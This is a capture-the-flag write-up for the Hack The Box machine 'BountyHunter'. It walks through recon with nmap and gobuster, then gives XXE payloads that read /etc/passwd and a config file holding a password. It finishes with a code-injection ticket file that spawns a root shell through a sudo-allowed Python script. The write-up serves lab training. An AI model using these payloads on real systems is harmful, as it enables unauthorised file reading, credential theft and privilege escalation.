HTB: BountyHunter
- TLDR -

...

Recon:

nmap -sT -sV -v <bountyhunter ip>. Only relevant information are open ports: 22, 80.

gobuster dir -x .php,.txt,.html -u <bountyhunter ip> -w <path/to/dict>. Relevant files: "db.php", "portal.php" (which can be found via the homepage menu).

Checkout the homepage, click "portal" through the menu, then click "here" to go to "Bounty Report System".

XXE Exploit:

The web app is vulnerable to a simple XXE attack. Encode the following data in base64, then once more in URL encoding. Passing the resulting string as a POST parameter named "data" to the file "tracker_diRbPr00f314.php" results in the page dumping the contents of "/etc/passwd":
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "file:///etc/passwd">]>
<bugreport>
<title>&mike;</title>
</bugreport>

Through this file we find the "development" user.

Getting User:

Using the same exploit, but a different payload, allows us to extract the contents of the previously discovered "db.php" file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE hack [<!ENTITY mike SYSTEM "php://filter/convert.base64-encode/resource=db.php">]>
<bugreport>
<title>&mike;</title>
</bugreport>

Now decode the returned base64 to retrieve a password. This password is used to ssh into the server using the previously obtained "development" username. cat user.txt prints the user flag.

Getting Root:

ls shows a file "contract.txt", whos contents indicate that we have "permissions" to test a specific tool. Using sudo -l shows us the tool's path and that we can run it as sudo using python 3.8. At some point in the code, the tool evaluates a specific line of a user-defined file. This file must adhere to specific rules. The following code can be saved as any name with the extension ".md":
# Skytrain Inc
## Ticket to 
__Ticket Code:__
**4+0 and exec('import pty; pty.spawn(\"/bin/bash\")')

NOTE: The "Ticket to" line MUST end with a single space, or the tool will reject the file.

Running the following command and passing it the exploit filename grants you a root shell: sudo python3.8 /opt/skytrain_inc/ticketValidator.py. Print the "root.txt" file's contents to get the root flag.



Date created: 2021.08.20